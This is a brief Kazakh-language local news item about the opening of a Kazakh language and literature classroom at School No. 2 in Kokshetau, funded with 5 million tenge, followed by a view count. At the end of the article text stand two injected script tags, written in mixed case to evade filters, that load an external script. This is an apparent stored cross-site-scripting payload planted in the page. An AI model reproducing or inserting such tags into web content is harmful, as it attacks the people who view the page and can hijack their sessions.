ҚР Тұңғыш Президенті Күні қарсаңында Көкшетау қаласының № 2 орта мектебінде мемлекеттік тіл сабақтарына арналған кабинетінің ашылуы өтті. Кабинет техникалық құралдарына интерактивті панель, оқушы және мұғалім жиһазы, ноутбуктер кіреді. Қалалық мектептерде жаңа жылда енгізілген жан басына қаржыландырудан 5 миллион теңге бөлініп, қазақ тілі мен әдебиеті кабинетін жабдықтандыруға мүмкіндік болды. Ашылу салтанатына қалалық білім бөлімінің басшысы Д. У. Башарова және облыстық әкелер кеңесінің төрағасы Е. Ж. Закирьянов қатысты.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.11.2020



Просмотров: 467